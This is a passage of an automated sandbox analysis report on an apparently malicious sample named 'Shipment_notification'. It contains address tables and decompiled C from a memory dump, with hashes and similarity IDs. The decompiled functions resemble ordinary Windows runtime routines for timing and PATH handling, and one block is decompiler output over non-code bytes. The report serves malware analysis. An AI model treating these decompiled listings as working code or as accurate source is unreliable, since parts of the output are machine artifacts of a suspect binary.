                                                                                0x01b449d7
                                                                                0x01b449da
                                                                                0x01b449e4
                                                                                0x01b449e5
                                                                                0x01b449f3
                                                                                0x01b44a02
                                                                                0x00000000
                                                                                0x01b44a02
                                                                                0x01b44972
                                                                                0x01b44974
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b44976
                                                                                0x01b44979
                                                                                0x01b44982
                                                                                0x01b44983
                                                                                0x01b44984
                                                                                0x01b4498b
                                                                                0x01b4498d
                                                                                0x01b44991
                                                                                0x01b44993
                                                                                0x01b44999
                                                                                0x01b4499d
                                                                                0x01b449a2
                                                                                0x01b449a2
                                                                                0x01b449a2
                                                                                0x01b44999
                                                                                0x01b449ac
                                                                                0x00000000
                                                                                0x01b449b3
                                                                                0x01b448f8
                                                                                0x01b448fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b448fe
                                                                                0x01b44895
                                                                                0x01b4489c
                                                                                0x01b448ad
                                                                                0x01b448b2
                                                                                0x01b448b5
                                                                                0x01b448b7
                                                                                0x01b448ba
                                                                                0x01b448bc
                                                                                0x01b448c6
                                                                                0x01b448c6
                                                                                0x01b448cb
                                                                                0x01b448d1
                                                                                0x01b448d4
                                                                                0x01b448d8
                                                                                0x01b448d8
                                                                                0x00000000
                                                                                0x01b448d8
                                                                                0x01b448be
                                                                                0x01b448c0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b448c2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b448c4
                                                                                0x00000000
                                                                                0x01b44882
                                                                                0x01b4487b
                                                                                0x01b44904
                                                                                0x01b44906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b44908
                                                                                0x01b4490e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b44910
                                                                                0x01b44917
                                                                                0x01b44917
                                                                                0x00000000
                                                                                0x01b44917
                                                                                0x01aeb1ba
                                                                                0x01b447f9
                                                                                0x01b447fc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b447fc
                                                                                0x01aeb1c0
                                                                                0x01aeb1c0
                                                                                0x01aeb1c3
                                                                                0x01aeb1cb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: _vswprintf_s
                                                                                • String ID:
                                                                                • API String ID: 677850445-0
                                                                                • Opcode ID: d7e8d998d020d0ba1dd1176a17170f8cfe5ff2923bd118b7d92147274ee8a832
                                                                                • Instruction ID: 5e936835a6c55a7f5291e713a6794c403146a26d608932b4367c94d665cb60e9
                                                                                • Opcode Fuzzy Hash: d7e8d998d020d0ba1dd1176a17170f8cfe5ff2923bd118b7d92147274ee8a832
                                                                                • Instruction Fuzzy Hash: BD51D075D002698FEF29CF68C845BAEBBB0FF04710F1082EDD859AB282D7704955EB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B0B944 Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 76%
                                                                                			E01B0B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1bdd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01B07D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01BB8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L01B29E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L01B2B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L01B2CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01B07D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01BB8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E01B2AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1bd8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1bd862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1bd8628; // 0x0
							_t116 =  *0x1bd862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                0x01b0b94c
                                                                                0x01b0b956
                                                                                0x01b0b95c
                                                                                0x01b0b95e
                                                                                0x01b0b964
                                                                                0x01b0b969
                                                                                0x01b0b96d
                                                                                0x01b0b96d
                                                                                0x01b0b970
                                                                                0x01b0b974
                                                                                0x01b0b97a
                                                                                0x01b0badf
                                                                                0x01b0badf
                                                                                0x01b0bae2
                                                                                0x01b0bae4
                                                                                0x01b0bae6
                                                                                0x01b0baf0
                                                                                0x01b52cb8
                                                                                0x01b0baf6
                                                                                0x01b0baf6
                                                                                0x01b0baf6
                                                                                0x01b0bafd
                                                                                0x01b0bb1f
                                                                                0x01b0bb1f
                                                                                0x01b0baff
                                                                                0x01b0bb00
                                                                                0x01b0bb00
                                                                                0x01b0bb03
                                                                                0x01b0bb03
                                                                                0x01b0bacb
                                                                                0x01b0bacf
                                                                                0x01b0bad0
                                                                                0x01b0bad1
                                                                                0x01b0badc
                                                                                0x01b0badc
                                                                                0x01b0b980
                                                                                0x01b0b980
                                                                                0x01b0b988
                                                                                0x01b0b98b
                                                                                0x01b0b98d
                                                                                0x01b0b990
                                                                                0x01b0b993
                                                                                0x01b0b999
                                                                                0x01b0b99b
                                                                                0x01b0b9a1
                                                                                0x01b0b9a5
                                                                                0x01b0b9aa
                                                                                0x01b0b9b0
                                                                                0x01b0b9bb
                                                                                0x01b0b9c0
                                                                                0x01b0b9c3
                                                                                0x01b0b9ca
                                                                                0x01b0b9cc
                                                                                0x01b0b9cf
                                                                                0x01b0b9d3
                                                                                0x01b0b9d7
                                                                                0x01b0ba94
                                                                                0x01b0ba94
                                                                                0x01b0ba98
                                                                                0x01b0baa3
                                                                                0x01b52ccb
                                                                                0x01b0baa9
                                                                                0x01b0baa9
                                                                                0x01b0baa9
                                                                                0x01b0bab1
                                                                                0x01b52cd5
                                                                                0x01b52cdd
                                                                                0x01b52cdd
                                                                                0x01b0babb
                                                                                0x01b0babc
                                                                                0x01b0bac2
                                                                                0x01b0bac3
                                                                                0x01b0bac3
                                                                                0x01b0bac6
                                                                                0x00000000
                                                                                0x01b0b9dd
                                                                                0x01b0b9dd
                                                                                0x01b0b9e7
                                                                                0x01b0b9e7
                                                                                0x01b0b9ec
                                                                                0x01b0b9ec
                                                                                0x01b0b9f1
                                                                                0x01b0b9f5
                                                                                0x01b0b9fa
                                                                                0x01b0ba00
                                                                                0x01b0ba0c
                                                                                0x01b0ba10
                                                                                0x01b0ba10
                                                                                0x01b0ba12
                                                                                0x01b0ba18
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0bb26
                                                                                0x01b0bb26
                                                                                0x01b0ba1e
                                                                                0x01b0ba1e
                                                                                0x01b0ba23
                                                                                0x01b0ba25
                                                                                0x01b0ba2c
                                                                                0x01b0ba30
                                                                                0x01b0ba35
                                                                                0x01b0ba35
                                                                                0x01b0ba41
                                                                                0x01b0ba46
                                                                                0x01b0ba4c
                                                                                0x01b0ba50
                                                                                0x01b0ba54
                                                                                0x01b0ba6a
                                                                                0x01b0ba6e
                                                                                0x01b0ba70
                                                                                0x01b0ba74
                                                                                0x01b0ba78
                                                                                0x01b0ba7a
                                                                                0x01b0ba7c
                                                                                0x01b0ba8e
                                                                                0x01b0ba90
                                                                                0x01b0ba92
                                                                                0x01b0bb14
                                                                                0x01b0bb14
                                                                                0x01b0bb16
                                                                                0x01b0bb16
                                                                                0x00000000
                                                                                0x01b0ba7c
                                                                                0x01b0bb0a
                                                                                0x01b0bb0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b0bb0f

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B0B9A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID:
                                                                                • API String ID: 885266447-0
                                                                                • Opcode ID: 4a87b791d0536f3dcd5a59ab1cd529c45a241d01039f16dbc06c42569199ee50
                                                                                • Instruction ID: d8afcc33dc336cc0908dd9e58a6e17da66257148e3abb064d76156812a9adf29
                                                                                • Opcode Fuzzy Hash: 4a87b791d0536f3dcd5a59ab1cd529c45a241d01039f16dbc06c42569199ee50
                                                                                • Instruction Fuzzy Hash: 86516C75608301CFC72ADF69C180A2ABFE5FB88610F1449AEF99587395DB30E844CB92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B12581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E01B12581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912173) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				void* _t245;
				signed int _t248;
				signed int _t250;
				intOrPtr _t252;
				signed int _t255;
				signed int _t262;
				signed int _t265;
				signed int _t273;
				signed int _t279;
				signed int _t281;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t299;
				signed int _t303;
				intOrPtr _t315;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t331;
				signed int _t332;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				signed int _t343;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x1bdd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t331 = 0x1bdb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t279 = 0x48;
				_t313 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t324 = 0;
				_v37 = _t313;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t332 = 0xc0000106;
						goto L32;
					} else {
						_t331 = L01B04620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t331;
						__eflags = _t331;
						if(_t331 == 0) {
							_t332 = 0xc0000017;
							goto L32;
						} else {
							 *(_t331 + 0x44) =  *(_t331 + 0x44) & 0x00000000;
							_t50 = _t331 + 0x48; // 0x48
							_t326 = _t50;
							_t313 = _v32;
							 *(_t331 + 0x3c) = _t279;
							_t281 = 0;
							 *((short*)(_t331 + 0x30)) = _v48;
							__eflags = _t313;
							if(_t313 != 0) {
								 *(_t331 + 0x18) = _t326;
								__eflags = _t313 - 0x1bd8478;
								 *_t331 = ((0 | _t313 == 0x01bd8478) - 0x00000001 & 0xfffffffb) + 7;
								E01B2F3E0(_t326,  *((intOrPtr*)(_t313 + 4)),  *_t313 & 0x0000ffff);
								_t313 = _v32;
								_t341 = _t341 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t326 = _t326 + (( *_t313 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E01B739F2(_t326);
									_t313 = _v32;
									_t326 = _t273;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t332 = _v68;
								__eflags = 0;
								 *((short*)(_t326 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t331 + _t281 * 4;
								_v56 = _t279;
								do {
									__eflags = _t313;
									if(_t313 != 0) {
										_t240 =  *(_v60 + _t291 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t291 * 4);
										 *(_t279 + 0x18) = _t326;
										_t244 =  *(_v60 + _t291 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01B12959))) {
												case 0:
													__ax =  *0x1bd8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd848c, __ax & 0x0000ffff);
														__eax =  *0x1bd8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E01B2F3E0(_t326, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x1bd8480 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd8484,  *0x1bd8480 & 0x0000ffff);
													__eax =  *0x1bd8480 & 0x0000ffff;
													__eax = ( *0x1bd8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E01B2F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E01B2F3E0(_t326, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t326 = _t326 + (_t268 >> 1) * 2 + 2;
													__eflags = _t326;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t326 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx =  *0x1bd575c;
													__eflags = __ebx - 0x1bd575c;
													if(__ebx != 0x1bd575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E01B2F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1bd575c;
														} while (__ebx != 0x1bd575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1bd8478 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd847c,  *0x1bd8478 & 0x0000ffff);
													__eax =  *0x1bd8478 & 0x0000ffff;
													__eax = ( *0x1bd8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E01B739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1bd6e58 & 0x0000ffff = E01B2F3E0(__edi,  *0x1bd6e5c,  *0x1bd6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1bd6e58 & 0x0000ffff;
													__eax = ( *0x1bd6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t313 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t324 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01B12935))) {
							case 0:
								__ax =  *0x1bd8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t313 =  &_v64;
								_v80 = L01B12E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1bd8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1bd8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E01AFEEF0(0x1bd79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E01AFEB70(__ecx, 0x1bd79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t332;
												if(_t332 < 0) {
													L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1bd7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01B04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E01AFEB70(__ecx, 0x1bd79a0);
										__eax = _v52;
										L36:
										_pop(_t325);
										_pop(_t333);
										__eflags = _v8 ^ _t338;
										_pop(_t280);
										return L01B2B640(_t219, _t280, _v8 ^ _t338, _t313, _t325, _t333);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t313 =  &_v36;
									_t277 = L01B12E3E(_t275,  &_v36);
									_t287 = _v36;
									_v76 = _t277;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x1bd5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1bd8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1bd8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1bd6e58 & 0x0000ffff;
								__eax = ( *0x1bd6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t324 = _t324 + 1;
								if(_t324 >= _v48) {
									goto L16;
								} else {
									_t313 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [ecx-0x4ed81fff], dh");
					 *_t331 =  *_t331 + _t338;
					_t334 = _t331 + 1;
					 *0xFFFFFFFFB1260502 =  *((intOrPtr*)(0xffffffffb1260502)) - _t313;
					 *_t326 =  *_t326 + _t279;
					_t283 = 0x25;
					_t245 = _t341;
					_t343 = _t244;
					 *0xFFFFFFFFB55B3502 =  *((intOrPtr*)(0xffffffffb55b3502)) - _t313;
					 *_t313 =  *_t313 + _t245;
					 *0xFFFFFFFFB1288002 =  *((intOrPtr*)(0xffffffffb1288002)) - _t334;
					_t335 = _t334 + _t334;
					asm("daa");
					_push(ds);
					 *0xFFFFFFFFB1284E02 =  *((intOrPtr*)(0xffffffffb1284e02)) - _t313;
					_a35 = _a35 + _t283;
					asm("fcomp dword [ebx-0x4b]");
					 *((intOrPtr*)(_t245 +  &_a1546912173)) =  *((intOrPtr*)(_t245 +  &_a1546912173)) + _t334 + _t334;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1bbff00);
					E01B3D08C(_t283, _t326, _t335);
					_v44 =  *[fs:0x18];
					_t327 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t248 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t250 = 4;
						while(1) {
							_v40 = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								break;
							}
							_t303 = _t250 * 0xc;
							_v48 = _t303;
							__eflags = _t284 -  *((intOrPtr*)(_t303 + 0x1ac1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t265 = E01B2E5C0(_a8,  *((intOrPtr*)(_t303 + 0x1ac1668)), _t284);
									_t343 = _t343 + 0xc;
									__eflags = _t265;
									if(__eflags == 0) {
										_t336 = E01B651BE(_t284,  *((intOrPtr*)(_v48 + 0x1ac166c)), _a16, _t327, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t250 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t250 = _t250 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t299 = _a4;
								__eflags = _t299;
								if(_t299 != 0) {
									_v36 = _t299;
									__eflags =  *_t299 - _t327;
									if( *_t299 == _t327) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t315 =  *((intOrPtr*)(_v44 + 0x30));
										_t252 =  *((intOrPtr*)(_t315 + 0x10));
										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t299;
										if( *((intOrPtr*)(_t252 + 0x48)) == _t299) {
											__eflags =  *(_t315 + 0x1c);
											if( *(_t315 + 0x1c) == 0) {
												L106:
												_t336 = E01B12AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t327 = 1;
													_t299 = _v36;
													goto L75;
												}
											} else {
												_t255 = L01AF6600( *(_t315 + 0x1c));
												__eflags = _t255;
												if(_t255 != 0) {
													goto L106;
												} else {
													_t299 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E01B12C50(_t299, _a8, _t284, _a16, _a20, _a24, _t327);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E01AFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t262 = E01B12AE4( &_v36, _a8, _t284, _a16, _a20, _t336);
									_v32 = _t262;
									__eflags = _t262 - 0xc0000100;
									if(_t262 == 0xc0000100) {
										_v32 = E01B12C50(_v36, _a8, _t284, _a16, _a20, _t336, 1);
									}
									_v8 = _t327;
									E01B12ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t248 = _t336;
					}
					L70:
					return E01B3D0D1(_t248);
				}
				L108:
			}



















































                                                                                0x01b12584
                                                                                0x01b12586
                                                                                0x01b12590
                                                                                0x01b12596
                                                                                0x01b12597
                                                                                0x01b12598
                                                                                0x01b12599
                                                                                0x01b1259e
                                                                                0x01b125a4
                                                                                0x01b125a9
                                                                                0x01b125ac
                                                                                0x01b125ae
                                                                                0x01b125b1
                                                                                0x01b125b2
                                                                                0x01b125b5
                                                                                0x01b125b8
                                                                                0x01b125bb
                                                                                0x01b125bc
                                                                                0x01b125bf
                                                                                0x01b125c2
                                                                                0x01b125c5
                                                                                0x01b125c6
                                                                                0x01b125cb
                                                                                0x01b125ce
                                                                                0x01b125d8
                                                                                0x01b125dd
                                                                                0x01b125de
                                                                                0x01b125e1
                                                                                0x01b125e3
                                                                                0x01b125e9
                                                                                0x01b126da
                                                                                0x01b126da
                                                                                0x01b126dd
                                                                                0x01b126e2
                                                                                0x01b55b56
                                                                                0x00000000
                                                                                0x01b126e8
